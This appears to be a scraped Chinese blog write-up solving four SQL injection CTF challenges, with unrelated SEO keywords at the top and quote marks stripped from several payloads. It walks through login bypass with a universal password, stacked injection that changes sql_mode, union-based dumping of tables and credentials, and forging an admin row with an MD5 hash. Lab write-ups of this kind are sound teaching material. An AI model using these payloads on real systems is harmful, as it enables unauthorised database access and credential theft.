哈尔滨搜索引擎排名,关键词排名优化易下拉技巧,网站主机选择与优化,app开发公司怎么收费[极客大挑战 2019]EasySQL
进行简单的尝试#xff0c;就知道是单引号的字符型注入 万能密码进行一个简单的尝试
结果就出来了 还是要了解一下原理
输入的是1#xff0c;形成的sql语句是错误的SELECT*FROM table_name WHERE username1and password123; 第一个单引号和第二个…[极客大挑战 2019]EasySQL
进行简单的尝试就知道是单引号的字符型注入 万能密码进行一个简单的尝试
结果就出来了 还是要了解一下原理
输入的是1形成的sql语句是错误的SELECT*FROM table_name WHERE username1and password123; 第一个单引号和第二个单引号形成了新的闭合剩余第三个单引号组成的sql语句不正确于是语句报错页面就会出现错误。
[SUCTF 2019]EasySQL
当我们输入非零数字的时候页面上有回显用0也是什么都没有字母也是什么都没有
我们就直接尝试一下命令
1;show databases; 1;show tables; 发现一个表为flag 猜答案应该就会在flag表中那么就可以查一下看看
1;show columns from Flag 1;show columns from用来查询表中列名称 没有回显应该是flag也是被过滤了想了一下其实在查询的数据库的时候就应该要发现是堆叠注入自己对堆叠注入还是不了解刚刚没有看出来。
修改sql_mode的值将||视为字符串的连接操作符而或非运算符即set sql_modePIPES_AS_CONCAT;
也就是堆叠注入下可以改变sql的||符号的作用就让||实现连接的功能
让 || 变成类似 concat() 函数
看看后台的查询语句
$sql select .$post[query].||flag from Flag;
区别
在MySQL中操作符||表示“或”逻辑 也就是只要有一个为真就可以为真了。
mssql中||表示连接操作符不表示或的逻辑
union injection联合注入也是将两条语句合并在一起两者之间有什么区别么区别就在于 union或者 union all 执行的语句类型是有限的可以用来执行查询语句例如查库表之类的而堆叠注入可以执行的是任意的语句将多条语句进行执行;代表一条语句的结束。
payload 1;set sql_modepipes_as_concat;select 1 非预期
尝试之后就会发现没有过滤*
payload: *,1 查询flag 拼接之后的语句为 select *,1 || flag from flag
先查找全部再去查找1
最后也是可以拿到结果的
[极客大挑战 2019]LoveSQL
尝试一下万能密码 看看回显位置 1 union select 1,2,3# 发现是在2和3 回显
字段 1order by 4# 只有三个字段
数据库 1 union select 1,database(),version()# 表 1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase()# 发现有二张表
geekuser l0ve1ysq1
先看第一个 1 union select 1,2,group_concat(column_name) from information_schema.columns where table_namegeekuser# 下一个也是一样的
也是先读取第一张表的内容 1 union select 1,2,group_concat(id,username,password) from geekuser# 下一张表的内容 1 union select 1,2,group_concat(id,username,password) from l0ve1ysq1# 发现这一张表的内容有许多在后面就会发现答案。
[GXYCTF2019]BabySQli 看看源代码 base32后base64 base32 只有大写字母和数字数字组成或者后面有三个等号。 base64 只有大写字母和数字小写字母组成后面一般是两个等号 到这里就暂时没有思路了
先看看列数 1 order by 1,2,3# 是不是被过滤了大写看看 就知道有三列并且还过滤了order
回显位置
1 union select 1,2,3# 利用sqli的特性在联合查询并不存在的数据时联合查询就会构造一个虚拟的数据。
eg
select * from user where username wxs union select 1,admin,123456; 临时创建了一个admin用户密码是123456
那就可以随便构建一个密码
123456
MD5 e10adc3949ba59abbe56e057f20f883e
payload
1 union select 1,admin,e10adc3949ba59abbe56e057f20f883e#pw123456 数据库会将123456的MD5值与里面的相比较如果匹配成功就会返回flag
